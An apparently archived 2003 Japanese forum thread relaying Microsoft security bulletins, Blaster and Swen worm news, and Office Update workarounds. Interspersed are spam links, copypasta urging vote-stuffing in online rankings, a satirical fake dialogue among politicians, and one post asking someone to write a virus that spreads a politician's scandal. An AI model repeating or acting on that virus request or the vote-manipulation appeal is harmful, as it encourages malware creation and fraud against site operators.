です。いろいろサイトで調べたりしましたが理由は不明です。

今日msのサポートにtelしましたが不通でした。。。

田代を一位に!!!!!!!

http://cozalweb.com/ctv/ranking/actor.html

http://www.popkmart.ne.jp/yozemi_ranking/a.html

http://www.no1boy.com/cgi-bin/choice/index.html


管理人が票を削っても、あきらめるな！！

〜コピペ推奨〜

つまらん。
田代はもういい。
次は逸見がいいな、、、、

>>632
WindowsUpdate機能って必要だけれど、ネットにあまり、または全くつなげないPCには
使い物にならない機能ですよね。
ネットにつなげなくても、フロッピーやMOもしくはCD-Rとかの移動媒体で感染しますから。
M$はネットではもちろん、アップデート毎に登録者全員に、CD-RWかDVD-RAMで、
フルパッチしたWindows本体と差分ファイルを配るべきだと思う。
CD-RWとかがみそね。必要なくなったら消して再利用できるところが環境にやさしい
:-P

j

店頭で配ってるらしいBlasterワーム対策CDを手に入れた人居る？

　　　　　　■ADSL回線速度向上サイト■

Windows95, 98, Me は、ダイアルアップに最適化されています。
これでは、ADSLでの速度を向上させることはできません。
ADSL最適化ソフトは市販されていますが、実はレジストリーの設定などで
簡単に行うことができるんです。
百聞は一見にしかず、まずは、やってみて下さい。
簡単に元の設定に戻せますので。

勿論、WindowsXP でも最適化できますし、市販のソフトを購入しても、
効果が現れなかった方も、試してみてください。

−−−−−−−−−−−−−−−−−−−−−−−−−
　 完全無料で高速化! 　まずは、試してみよう!
http://kadsl.fc2web.com/
−−−−−−−−−−−−−−−−−−−−−−−−−

※この記事はコピペした物です。
※効果があったら他の板にもコピペしてください。
※勿論、試す前にコピペしても構いません

野中の元秘書口利き５千万醜聞発覚を、テレビなどのマスメディアが全く報道しない、北朝鮮のような現状をどう思いますか？
誰か、野中の犯罪を日本中に広めるウィルスを作ってくれませんか？

★野中窮地！元秘書口利き５千万醜聞発覚
　反小泉勢力スキャンダル連発、倒閣戦略に暗雲

・９月２０日投票の自民党総裁選をにらみ、小泉純一郎首相の再選阻止の急先鋒
　にいる橋本派幹部で抵抗勢力のドン、野中広務元幹事長を突如、スキャンダルが
　直撃した。元秘書官が巨額手形詐欺事件の関連会社から計５０００万円余もの
　資金提供を受けていたもので大打撃は避けられない。

　「信頼して秘書にしたのに。知らなかった。情けない…」。「影の宰相」とまで
　言われた野中氏は２１日までに、報道機関の取材にこう答えた。
　関係者によると、野中氏が自治相や官房長官当時に秘書官を務めた加藤芳輝
　元秘書（４７）が、総合商社「ニチメン」巨額手形詐欺事件の被告が会長だった
　電子機器メーカーやゼネコンから計５０００万円余の提供を受け、見返りに国の
　融資保証をめぐり通産省幹部と面会させていたという。

　政界実力者の威光をバックに、秘書が自らのカネ集めに奔走する永田町の
　あきれた実態が白日の下にさらされたわけで、「打倒小泉」を掲げて秘策を練る
　野中氏の打撃は計り知れない。（一部略）
　http://www.zakzak.co.jp/top/top0821_1_07.html

今日会社の人間が対策CD貰ってきてたみたい
大き目の封筒（？）に入ってたかな？

今、Windows Updateって正常に動いてますか？
なんかエラーが出て先に進めない・・・

すみません。繋がりましたm（＿）m

>>678　いいなー。地元の大手電器屋には無かった。(´･ω･｀)ｼｮﾎﾞｰﾝ
いや、自分は大丈夫なんだけどド素人の友人に渡したい…

>M$はネットではもちろん、アップデート毎に登録者全員に、CD-RWかDVD-RAMで、
>フルパッチしたWindows本体と差分ファイルを配るべきだと思う。

つうか、97〜98年頃のIE3や4の頃のNT4用のサービスパックや、IEやネスケのような「大物」は、
まだ定額常時接続の手段もほとんど無く、夜間のテレホーダイの時間帯で落とすのも
結構しんどかったため、PC雑誌の付録CDに収録されるのを待ってたりしたもんだけど。

その頃やそれ以前は、BSDやLinuxもISOイメージを落としてCDに焼くなんて個人じゃ夢物語で、
学校や職場で落としてCDに焼いたりMOに分割して持ち帰ったりするか、
そういうツテもない香具師は最低限のパッケージだけ落として自分でインスコしてたもんだ…

再インストールした時って、WindowsUpdateしてる間に穴つつかれるよね？

>再インストールした時って、WindowsUpdateしてる間に穴つつかれるよね？

ルータ持っててport135を塞いであるか、設定で余計なポート全部閉じれば大丈夫。
何も対策してなければ、updateしてる間に喰らうよ。

まあ、事前にパッチを落としておく余裕があるなら、落としておいた方がいいのは確か。
Win2KならSP4もね。

>>682
OSに興味あって、自分で色々できる人はいいけれど、
ワープロ代わりにしか使ってなくて、原稿送るのにメールをたまに使う人間なんて、
雑誌までチェックしないよねぇ。
そういうユーザーに、提供企業がちゃんと情報を伝達するのは義務だと思う。
ただでさえバグ入りプログラムであっても責任は負わないってスタンスを
取ってるんだもの。バグが捕れないのは宿命だとしても、その修正を
提供していくことはできるでしょ。とくにパソコンの根源にかかわるOSであり
それで世界NO1のシェアになっているM$は当然、修正製品を
個人に送ることは義務でしょう。

>>685
大体、契約書に「使わせてやるけど、後はどうなったって知らないよ」って感じのことが書いてあって、
それを了承して使ってるんだから、修正品を送るのは義務ではないと思う。

ソフトを作ったトコが不具合が判明した際にパッチ等不具合を修正する物を作り
それを公表する義務が有るのは当然だが
ソフト使用者にも保守を行う義務を負わせて良いのではないだろうか。
何か問題が起きた際に自分だけでなく他人も被害に巻き込まれる事考えると
危険物だって認識をもつべきなのかもしれない。
車だって定期点検しなくちゃならないわけだしね。

とまぁSobig.Fで集中攻撃を受けてメールボックスを潰された人のぼやきでした。
マジでウイルス送ってきた奴を訴えたい気分だ。
これはBlasterの突く穴とは関係ないけどさ。

なんかいつの間にか情報スレじゃなくて質問スレになってない？(^^;

情報提供の常連さんもアホくさくなってるだろうなぁ

【Microsoft 製品に複数の脆弱性、うち1件は最大の深刻度評価】
　　ttp://japan.internet.com/webtech/20030904/12.html

記事より抜粋。
第1の脆弱性は、『Microsoft Visual Basic for Applications』(VBA) が、
受け取るドキュメントプロパティを確認する方法に存在するもので、悪用
すればログインしているユーザーの権限で任意のプログラムコード実行
を招く恐れがあるという。深刻度は『緊急』です。

2件目は Word の脆弱性で、セキュリティ情報「MS03-035 (日本語概要)」
を公開し、深刻度を上から2番目の「重要」とした。

もう1件は『WordPerfect Converter』に存在するバッファオーバーランの
脆弱性で、セキュリティ情報「MS03-036 (日本語概要)」を公開し、こちら
も深刻度を「重要」とした。

Office Updateしましょう。

>>687
>ソフト使用者にも保守を行う義務を負わせて良いのではないだろうか。
>何か問題が起きた際に自分だけでなく他人も被害に巻き込まれる事考えると
>危険物だって認識をもつべきなのかもしれない。
>車だって定期点検しなくちゃならないわけだしね。

車と同じならば製造物責任、PL法が適用されるということ。
修正パッチだけじゃすまなくなるねぇ。
公表する義務どころか、欠陥扱いで賠償請求だ。

Microsoft Access Snapshot Viewer の未チェックのバッファにより、コードが実行される (827104) (MS03-038)
登録日 : 2003/09/04　更新日 : 2003/09/04
http://www.microsoft.com/japan/technet/security/bulletin/ms03-038.asp

このセキュリティ情報の対象となるユーザー :　Microsoft Access またはダウンロード可能な
Microsoft Access Snapshot Viewer を使用しているお客様
脆弱性の影響 :攻撃者により、任意のコードが実行される可能性があります
最大深刻度 :警告
推奨する対応策 :　Microsoft Access またはダウンロード可能な Microsoft Access Snapshot Viewer を
使用しているお客様はできる限り早期に修正プログラムをインストールして下さい。

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。(略)
Microsoft Access 2002/2000の修正プログラムは Office アップデート からインストール
することもできます。
Office アップデートの利用方法については以下のサイトを参照してください。
http://www.microsoft.com/japan/security/square/guard/a04g41.asp

またかよ。

http://jbbs.shitaraba.com/study/3313/

>>691
でもまあ、そういう”認識”は持った方がいいってのはその通りかもね
それができるのは今の若い世代がオサーンになる頃だと思うけど

Visual Basic for Applications の問題により、任意のコードが実行される (822715) (MS03-037)
登録日 : 2003/09/04　更新日 : 2003/09/04
http://www.microsoft.com/japan/technet/security/bulletin/ms03-037.asp

絵でみるセキュリティ情報 :
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-037e.asp

影響を受けるソフトウェア :
Microsoft Visual Basic for Applications SDK 5.0
Microsoft Visual Basic for Applications SDK 6.0
Microsoft Visual Basic for Applications SDK 6.2
Microsoft Visual Basic for Applications SDK 6.3

影響を受けるソフトウェアを含む製品 :
Microsoft Access 97/2000/2002
Microsoft Excel 97/2000/2002
Microsoft PowerPoint 97/2000/2002
Microsoft Project 2000/2002
Microsoft Publisher 2002
Microsoft Visio 2000/2002
Microsoft Word 97/98 (日本語版)/2000/2002
Microsoft Works Suite 2001/2002/2003
(Microsoft Works Suite 2002 および 2003 は、英語版のみの製品です。)
Microsoft Business Solutions Great Plains 7.5
Microsoft Business Solutions Dynamics 6.0/7.0
Microsoft Business Solutions eEnterprise 6.0/7.0
Microsoft Business Solutions Solomon 4.5/5.0/5.5
(Microsoft Business Solutions は、英語版のみの製品です。)

あれ？週間WindowsUpdateの創刊はまだでしか？

深刻度 :
Microsoft Visual Basic for Applications SDK 5.0 緊急
Microsoft Visual Basic for Applications SDK 6.0 緊急
Microsoft Visual Basic for Applications SDK 6.2 緊急
Microsoft Visual Basic for Applications SDK 6.3 緊急

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。(略)

注意事項：　適用する修正プログラムは、VBA を使用するアプリケーションのうち、どれを使用しているか
によって異なります。「よく寄せられる質問」の「この脆弱性に対する修正プログラムには多くの種類が
ありますが、どれをインストールする必要がありますか?」の質問を読み、適用する必要がある修正
プログラムのバージョンを確認することを強くお勧めします。(後述)

マイクロソフトは、Office Update の Web サイト
http://www.office.microsoft.com/japan/ProductUpdates/default.aspx を訪問し、Office ファミリー製品
にこのセキュリティ修正プログラムおよびほかのすべてのアップデートを検索し、インストールを行うことを
推奨します。 （注意 : Office Update では Office 97 または Visio 2000 はサポートされていません。）
Office アップデートの利用方法については以下のサイトを参照してください。
http://www.microsoft.com/japan/security/square/guard/a04g41.asp

修正プログラムに関する追加情報 :　対象プラットフォーム :(略)
この修正を含む予定のサービス パック :　この問題に対する修正プログラムは Microsoft Office XP、
Microsoft Office 2000、Microsoft Project 2002、Microsoft Project 2000、Microsoft Visio 2002 用に
今後リリースされる Service Pack に含まれる予定です。
再起動の必要性 :インストール時に vbe.dll または vbe6.dll が使用されている場合、
インストール終了時に再起動する必要があります。
修正プログラムのアンインストール :不可
修正プログラムに含まれる過去の修正 :　なし
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)

詳細情報 :
よく寄せられる質問 ： マイクロソフトセキュリティ情報（MS03-037）
http://www.microsoft.com/japan/technet/security/bulletin/fq03-037.asp
US マイクロソフトセキュリティ情報（MS03-037）
http://www.microsoft.com/technet/security/bulletin/ms03-037.asp
この脆弱性に対するサポート技術情報 （KB） は現在準備中です。

マイクロソフト セキュリティ情報 (MS03-037) ： よく寄せられる質問
http://www.microsoft.com/japan/technet/security/bulletin/fq03-037.asp

Q.この脆弱性に対する修正プログラムには多くの種類がありますが、どれをインストールする必要がありますか?
A.この脆弱性に対する修正プログラムは、Microsoft VBA のバージョンおよび
使用しているホスト アプリケーションによって異なります。
・Microsoft VBA 用修正プログラム
以下のアプリケーションを使用している場合、Microsoft VBA 用の修正プログラムを
適用する必要があります。Microsoft VBA 5.0/6.0/6.2/6.3.
Microsoft Access 97
Microsoft Excel 97
Microsoft PowerPoint 97
Microsoft Word 97
Microsoft Word 98 (日本語版)
Microsoft Works 2001/2002
Microsoft Works Suite 2003
Microsoft Business Solutions Great Plains 7.5
Microsoft Business Solutions Dynamics 6.0/7.0
Microsoft Business Solutions eEnterprise 6.0/7.0
Microsoft Business Solutions Solomon 4.5/5.0/5.5

・Microsoft Project 2000、Microsoft Project 2002 および Microsoft Visio 用の修正プログラム :
Microsoft Project または Microsoft Visio を使用している場合、それらの製品向けの
修正プログラムを適用する必要があります。

・Microsoft Office 2000 and Microsoft Office XP 用の修正プログラム :
Microsoft Office 2000 または Microsoft Office XP (Publisher 2002 を含む) を使用している場合、
それらの製品向けの修正プログラムを適用する必要があります。

Q,上記の製品のうち、複数の製品を使用しています。それぞれの製品向けの
特定の修正プログラムを適用する必要がありますか?
A.はい。上記のそれぞれの製品向けの修正プログラムをすべて適用する必要が
あります。たとえば、Microsoft Office XP および Microsoft Visio 2000 を使用
している場合、Microsoft Office XP 向けの修正プログラムおよび Microsoft Visio
向けの修正プログラムの両方を適用する必要があります。

Q.使用している Microsoft VBA のバージョンはどのように確認することができますか?
A.VBA がコンピュータ上に存在するかどうかのチェック、また使用している VBA の
バージョンのチェックを行うには、以下のファイルのファイルバージョンを確認してください。
（C:\ は使用しているシステム ドライブとなります）
以下のファイルが存在する場合、VBA 5.0 を使用していることになります。
C:\Program Files\Common Files\Microsoft Shared\VBA\vbe.dll
以下のファイルが存在する場合、VBA 6.0 を使用していることになります。
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\vbe6.dll

Q.Microsoft VBA を使用するマイクロソフト以外の製品を使用しています。何をする必要がありますか?
A.マイクロソフトは Microsoft VBA を使用するアプリケーションの開発を行っているサード パーティと
協力し、このセキュリティ上の脆弱性について認識しているか、またそれらの製品に組み込む必要な
Microsoft VBA への更新を所有しているかを確認しました。ユーザーは、該当のソフトウェア製造業者に
連絡し、Microsoft VBA を使用するマイクロソフト以外のアプリケーションへのアップデートを入手する
必要があります。

>>695
ソフトウェアにPL法適用しようとしている政治団体などが、
あるみたいだから、そんなに遠い事じゃないかも。

それに今の若い人がオサーンになるころは、いん石で滅んでるかも:-P

WordPerfect コンバータのバッファオーバーランにより、コードが実行される (827103) (MS03-036)
登録日 : 2003/09/04　更新日 : 2003/09/04
http://www.microsoft.com/japan/technet/security/bulletin/ms03-036.asp

このセキュリティ情報の対象となるユーザー :　MicrosoftR Office、Microsoft FrontPageR、
Microsoft Publisher または Microsoft Works Suite を使用しているお客様
脆弱性の影響 :　攻撃者の選択したコードが実行される可能性があります。
推奨する対応策 :　次の影響を受ける製品を使用しているお客様は可能な限り早期セキュリティ
修正プログラムを適用して下さい。

絵でみるセキュリティ情報 :
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-036e.asp

影響を受けるソフトウェア :
Microsoft Office 97/2000/XP
Microsoft Word 98 (日本語版)
Microsoft FrontPage 2000/2002
Microsoft Publisher 2000/2002
Microsoft Works Suite 2001/2002 (英語版)/(英語版)
(Works Suite 2002 および 2003 は、英語版のみの製品です。)

深刻度 :
Microsoft Office (すべてのバージョン) 重要
Microsoft FrontPage (すべてのバージョン) 重要
Microsoft Publisher (すべてのバージョン) 重要
Microsoft Works Suite (すべてのバージョン) 重要

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。(略)
Office 97 および Word 98 (日本語版) の日本語版修正プログラムは現在準備中です。
準備が出来次第このページにてご案内いたします。

Office 製品のアップデート http://www.office.microsoft.com/japan/ProductUpdates/default.aspx で
適切な修正プログラムおよび Office ファミリー製品に対するすべてのそのほかの公開された更新を見つけ、
インストールすることを推奨します。
(注 : Office Update は Office 97 および Visio 2000 をサポートしません。)
Office アップデートの利用方法については以下のサイトを参照してください。
http://www.microsoft.com/japan/security/square/guard/a04g41.asp

再起動の必要性 :なし
修正プログラムのアンインストール :不可
修正プログラムに含まれる過去の修正 :なし
修正プログラムが正しくインストールされたかどうか確認する方法 :(略)

Microsoft Word の問題により、マクロが自動的に実行される (827653) (MS03-035)
登録日 : 2003/09/04　更新日 : 2003/09/04
http://www.microsoft.com/japan/technet/security/bulletin/ms03-035.asp

このセキュリティ情報の対象となるユーザー :MicrosoftR Word を使用しているお客様
脆弱性の影響 :警告なしでマクロが実行される
推奨する対応策 :　Microsoft Word の影響を受けるバージョンを使用しているお客様は
セキュリティ修正プログラムを直ちに適用して下さい。
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-035e.asp

影響を受けるソフトウェア :
Microsoft Word 97/98 (日本語版)/2000/2002
Microsoft Works Suite 2001/2002 (英語版)/2003 (英語版)
(Works Suite 2002 および 2003 は、英語版のみの製品です。)

深刻度 :
Microsoft Word (すべてのバージョン) 重要
Microsoft Works Suite (すべてのバージョン) 重要

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。(略)
Microsoft Word 97 および Microsoft Word 98 (日本語版) の日本語版修正プログラムは現在準備中です。
準備が出来次第このページにてご案内いたします。

Office 製品のアップデート http://www.office.microsoft.com/japan/ProductUpdates/default.aspx で
適切な修正プログラムおよび Office ファミリー製品に対するすべてのそのほかの公開された更新を見つけ、
インストールすることを推奨します。
(注 : Office Update は Office 97 および Visio 2000 をサポートしません。)
Microsoft Word 2000/2002 の修正プログラムは Office アップデート からインストールすることもできます。
Office アップデートの利用方法については以下のサイトを参照してください。
http://www.microsoft.com/japan/security/square/guard/a04g41.asp

再起動の必要性 :　なし
修正プログラムのアンインストール :　不可
修正プログラムに含まれる過去の修正 :　なし
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)

NetBIOS の問題により、情報が漏えいする (824105) (MS03-034)
登録日 : 2003/09/04　更新日 : 2003/09/04
http://www.microsoft.com/japan/technet/security/bulletin/ms03-034.asp

このセキュリティ情報の対象となるユーザー :　MicrosoftR WindowsR をご使用のお客様
脆弱性の影響 :　情報の漏えい
推奨する対応策 :　ユーザーは、影響を受けるコンピュータにこのセキュリティ修正プログラムを
適用するかどうかを評価してください。
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-034e.asp

影響を受けるソフトウェア :
Microsoft Windows NT Server 4.0R
Microsoft Windows NT Server 4.0, Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server? 2003

影響を受けないソフトウェア :
Microsoft Windows Millennium Edition

深刻度 :
Windows NT 4.0 Server 注意
Windows NT 4.0, Terminal Server Edition 注意
Windows 2000 注意
Windows XP 注意
Windows Server 2003 注意

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。(略)
Windows NT Server 4.0, Terminal Server Edition (PC/AT 互換機) 以外の修正プログラムは
Windows Update からインストールすることもできます。

再起動の必要性 :　あり
修正プログラムのアンインストール :　可
修正プログラムに含まれる過去の修正 :　なし
修正プログラムが正しくインストールされたかどうか確認する方法 :(略)

>>691 PL法の構成要件として、
製造物、しかもソフトウェアのような無体物ではないものの欠陥によって発生し
かつ、製造物の安全性に係わるような損害が生じていることが必要なのよね。
しかも欠陥による被害が，その製造物自体の損害にとどまった場合であれば
対象にならない。

なお、>>690 = >>692 >>696 >>698-701 >>703-707ですので念のため。
>>708-709は>>690の記事以外の問題です。

小泉「しかし、あれですな。改革改革と言ってれば阿呆な国民は支持してくれるんだから楽なもんですよ」
亀井「親小泉と抵抗勢力の対決構図を煽った甲斐があったってもんだよな」
青木「そうだわな」
古賀「単純な奴らですよね」
野中「私と青木君が対立してるなんてマスコミの報道は笑っちゃうよ。あとは粛々と詰めの作業を行うだけだな」
小泉「そうですね。あともう少しですよ」
江藤「ここまで来るのに苦労したが、これで我が党は安泰だな」
橋本「我が派も安泰ですよ」
森　「どうだ小泉君、今度の選挙もいけそうか」
小泉「任せてください。今回も圧勝しますよ。俺が何言っても支持しますからね、あいつらは」
野中「君もワルよのお。小泉君」
小泉「いえいえ。野中さんほどではありませんよ。フッフッフ」
青木「だわな」
一同「フッフッフッフ。アッハッハッハッハッハッハッハッ」

>>710
それは現行の法であって、PL法適用の解釈を広げてソフトにかけようって
動きがあるってことで。
べつにPL法をソフトにかけよう運動家じゃないんで、これ以上の話は
その手の方と、言うことで。

あーあ、またかめんどいなぁ。
なんかもっといいパソコンってないの？
ワープロとエクセルとホームページとメール見れればOK。

winぱっちまんどくせ。
いいじゃんセキュリティなんて。アプリつかえりゃ。
どうせ、秘密なんてねーし。

>715
そーゆー考えをしている人のPCが踏み台にされて
あちこちに迷惑かけるのです。

と、マジレスしてみる。

なんか昨日のアップデート後、異常に重くなった
（しばしばメモリ不足になる）のだが・・・

ここは　【セキュリティ情報総合スレッド】

雑談程度のレスするなよ・・これだから２ちゃんねらは

今度のパッチは何なの？

>>718
おまえﾓﾅｰ
と、言ってみたかった。

ぶっちゃけ、どうなの。
今回、何すりゃいいの？

最初期のoffice97なんで、office97用パッチ落としたけど、
当てようとしたら「古いバージョンにはインスコできません」とゆわれた。
もうサポート外らしいんでofficeごとアンインスコ。
office系のファイルもらったらIEとか自在眼で見ればいいや…。

VBがだめってことは、VB使ってるフリーソフト等もまるごとだめってことでしょうか？

私はウイルスです

>>697
> あれ？週間WindowsUpdateの創刊はまだでしか？

もう冗談抜きでディアゴスティーニに頼みたい。
引越で当分ナローなんだよこっちは！＞MS

>>714
Lindowsとか。
無料でM$ Office互換のOpenOfficeも使えるし、これにでもしとけ。

------------------------------------------------------
つーことで、このスレの「情報」の濃度が下がってうざいので、
以下、雑談系は然るべきスレでやること。

窓板氏乙！
むむむ氏はどこに行ったんだろ

スレ違いだったらごめんなさい。
どこで聞いたらいいか分からないもので・・・。
突然、「シャットダウンします」と出て
再起動してしまいます。
今、流行っているウィルスみたいですが
駆除の仕方が分かりません。
ＰＣに入っているウィルススキャンをしても
ひっかからないのですが、このウィルスは
そういうものなのですか？
どなたかご存知の方がいらしたら教えてください。

http://www./index.cgi?id=1057943374

>>723
べつんところで聞いてみます。

>>723
Q.Microsoft VBA とは何ですか?
A.Microsoft VBA はクライアント デスクトップ パッケージのアプリケーションの開発および
既存のデータやシステムにそれらを統合するための開発技術です。Microsoft VBA は
Microsoft Visual Basic 開発システムを基本にしています。Microsoft VBA は プロジェクト
ウインドウ、プロパティ ウインドウおよびデバッグ ツールなど、Microsoft Visual Basic を
使用する開発者に一般的に使用される同じ要素を特徴づける統合開発環境 (IDE) を提供します。
また、Microsoft VBA には、カスタム ダイアログ ボックスを作成する Microsoft フォーム、
ユーザー インターフェイスを構築するための ActiveXR コントロールも含まれます。
VBA は直接ホスト アプリケーションに統合されます。VBA を含むソフトウェア プログラムは、
カスタマイズ アプリケーション （特定のビジネス ニーズに合わせて作成することができる
アプリケーション） と呼ばれています。Microsoft Office は Microsoft VBA が組み込まれる
多くのアプリケーションのうちの 1 つで、ユーザーは Microsoft Office を基にカスタム
アプリケーションを開発することができます。Microsoft VBA が組み込まれているマイクロソフト
以外のアプリケーションもあります。

>>727 むむむ氏はご職業が多忙な方らしいですよ。私が暇って訳じゃないですが。

>>729
コンピュータウイルス関係総合質問スレッド
http://pc2.2ch.net/test/read.cgi/pcqa/1061572290/l50

それにしてもOffice Updateのめんどくせーったらねーな。
何回CD-ROM入れ替えさせるんだか。

しかも、CD-ROM入れ替えのダイアログが全面に出てこないのも
不便だったな。

>>732 diskに余裕がある人はcdの中身をまるごとコピーして そこからセットアップすると挿入要求出なくて楽ですよ 後からコピーしてもレジストリかどこかの書き換えをすると可能だったような。

>>732 diskに余裕がある人はcdの中身をまるごとコピーして
そこからセットアップすると挿入要求出なくて楽ですよ
後からコピーしてもレジストリかどこかの書き換えをすると可能だったような。

>>732 diskに余裕がある人はcdの中身をまるごとコピーして
そこからセットアップすると挿入要求出なくて楽ですよ
後からコピーしてもレジストリかどこかの書き換えをすると可能だったような。

>>733-735 スマソ、、、（；´Д｀）

ちょっとおもしろかったりする

窓板氏乙です

米MS、とんだお粗末-重大な脆弱性用のパッチが役立たず
http://japan.cnet.com/news/ent/story/0,2000047623,20060815,00.htm

>セキュリティの専門家によると、Internet Explorerのなかに発見された重要な脆弱性を修正するために、
>米Microsoftがリリースしたパッチが、実は機能しないという。

　　_, ._
（　ﾟ Дﾟ）

MS03-039 に関する情報
「MS03-039: RPCSS サービスのバッファ オーバーランによりコードが実行され
る (824146)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。


概要
====
この問題は、下記製品に含まれる未チェックのバッファにより、不正な
プログラムが実行される可能性がある問題です。最悪の場合、悪意のある
ユーザーにお客様のコンピュータ上で任意のプログラムが実行される可能性が
あります。

対象となる製品
==============
・Microsoft Windows NT Workstation 4.0
・Microsoft Windows NT Server 4.0
・Microsoft Windows NT Server 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Windows Server 2003

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-039ov.asp

Windows XP Service Pack 1 適用のお願い
- Windows XP 初期出荷版(SP1 未適用製品)向け修正プログラム提供終了のお知らせ
更新日: 2003 年 9 月 12 日
http://www.microsoft.com/japan/windowsxp/endofgold.asp

弊社製品に対する製品サポートの提供期間、および提供内容の基本的な方針をまとめた
ガイドライン「デスクトップ Windows 製品のライフサイクルガイドライン
(http://www.microsoft.com/japan/windows/lifecycle.asp)」に基づき、2003 年 9 月 4 日以降は
Service Pack 1 を適用した Windows XP のみ、修正プログラム（ホットフィックスサポート）の
対象とさせていただきます。

Windows XP 初期出荷版(SP1 未適用製品)をご利用のお客様につきましては、新しい修正
プログラムの提供を終了させていただきますが、製品に関するお問い合わせを含むその他の
製品サポート（無償・有償）は、引き続きご利用頂く事ができます。また、Service Pack 1 を含む
2003 年 9 月 3 日までに公開済みの修正プログラムは入手可能であり、Windows Update も
引き続きご利用頂く事ができます。

Office Update を実行すると必要に応じて Office Update 用の ActiveX コントロールの
更新が促されるが、古い ActiveX コントロールが proxy サーバなどに cache されていると
この更新がうまくいかず、結果として Office Update に失敗する場合がある場合の対策
(http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/09.html#20030905_MS03-037 より)

その1 http://memo.st.ryukoku.ac.jp/archive/200309.month/6368.html
その2 http://memo.st.ryukoku.ac.jp/archive/200309.month/6369.html
その3 http://memo.st.ryukoku.ac.jp/archive/200309.month/6371.html

(一般ユーザにも対処できる方法なのでその3を抜粋)
C:\> telnet <proxyのホスト名> <proxyのport>
GET http://office.microsoft.com/productupdates/content/opuc.cab HTTP/1.0
Host: office.microsoft.com
Pragma: no-cache

と、叩くと Squid の管理権限がなくても このファイルだけ Update できます。
# 最後の空行も入れてください。

保守ﾃﾞｽﾖ

マイクロソフトのウイルス騒ぎにはもうウンザリ
http://japan.cnet.com/news/pers/story/0,2000047682,20060471,00.htm

“No more MSBlast”――悪用コードの公開を受け政府、業界がパッチ適用を呼びかけ
http://www.zdnet.co.jp/enterprise/0309/18/epn21.html

2年前の脆弱性を突いた新ウイルスが拡散

2年前に発見されたInternet Explorer（IE）の脆弱性に付け込む新型ワームが急速に拡散している。
このワームは「Swen」「Gibe.F」などの名称で呼ばれ、Microsoftが2001年3月のセキュリティ速報で
公表した脆弱性を利用しているようだ（2001年4月の記事参照）。

http://www.zdnet.co.jp/enterprise/0309/19/epn03.html

>>746
こいつは今のところ、NetNewsで拾ったアドレスだけにばら撒いてる
ってとこで可愛げがあるんだけど、破壊力は凄まじいです。多くの
２ちゃんねらは関わり合いが無いみたいだから、あまり話題にならない
けどね。

少ない私でも一日100通オーバー、多い人だと千通オーバーの
ウイルス付き大容量メールが送信されるので、メールスプール溢れ
まくり。ダイヤルアップでメール受信してる人なんかは、（(；ﾟДﾟ)ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
ですな。

BLAST系も増加してるみたいだし、今年は間違いなく最悪の年です。

Protect Your PC - PCを守るための3つの手順
http://www.microsoft.com/japan/security/protect/default.asp?&SD=GN&LN=JA&gssnb=1

「マイクロソフトの支配が、国家安全保障の脅威に」：米業界団体報告書
http://japan.cnet.com/news/ent/story/0,2000047623,20061069,00.htm

Delphi に付属する VCL にバッファオーバーフロー。
http://memo.st.ryukoku.ac.jp/archive/200309.month/6508.html

概要:
-----
Delphi は Borland の提供する Windows アプリケーションの統合開発環境です。
Delphi に付属するクラスライブラリ VCL に含まれる
TComboBox (コンボボックスを抽象化したクラス)
TListBox (リストボックスを抽象化したクラス)
TToolBar (ツールバーを抽象化したクラス)
TListView (リストビューを抽象化したクラス)
の各クラスにはバッファオーバーフローを引き起こすバグがあることがわかり
ました。

このバッファオーバーフローにより Delphi によって作成されたアプリケーシ
ョンには、任意のコードが実行可能なセキュリティホールが存在し得ます。

確認したバージョン:
-------------------
Delphi 3.1 Profesional
Delphi 5 Profesional
Delphi 6 Personal (TListBox は問題なし)

その他のバージョンについては該当するかどうか未確認です。

窓板住人注：C++Builderにも同様の脆弱性を有する可能性は否定できません。
ご注意下さい。

Office のアップデートの不具合と回避策について
最新更新日: 9/19/2003
http://www.microsoft.com/japan/office/security/

概要
「Office のアップデート」を実行すると、下記のような画面が表示され、
「Office のアップデート」を先に進めることができなくなることがあります。
この現象については、全てのユーザにあてはまる現象ではございません。
この現象が起こった場合には、「回避方法」を参照し、セキュリティ アップデート
をインストールすることができます。
この現象につきましては、現在弊社にて調査中です。

Windows Update 総合情報
http://www.microsoft.com/japan/support/wuinfo/default.aspx

「Windows Update 総合情報」は、Windows Update の使用方法などの基礎知識から、
現在発生している Windows Update に関連する不具合、またお客様よりよく寄せられる
質問とその回答など、Windows Update に関する全ての情報を提供するサイトです。

「Windows Update の基礎知識」では、Windows Update の説明と、その使用方法など
についての情報をご確認いただけます。

「Windows Update に関するトラブル情報」では、最新のトラブル情報や、お客様から
よく寄せられる質問、また Windows Update に関する技術情報一覧などをご確認
いただくことができます。

マイクロソフト サポート技術情報 - 827667
[IE] Q822925 (MS03-032) を適用すると相対 URL を使用したスクリプトで
HTTP 404 エラーが発生する
http://support.microsoft.com/default.aspx?scid=kb;ja;827667

現象
マイクロソフト セキュリティ情報 MS03-032 に記載されている Internet Explorer 用
の累積的なセキュリティ修正プログラム(Q822925)を適用した後、これまで動作していた
スクリプトが正しく動作しなくなり、フレームやウィンドウでスクリプトを実行した際に次の
エラーメッセージが表示されることがあります。
「HTTP 404 - ファイル未検出」

この問題は、次の場合に発生します。
・フレームやウィンドウから他のページ内のスクリプトをコールしている
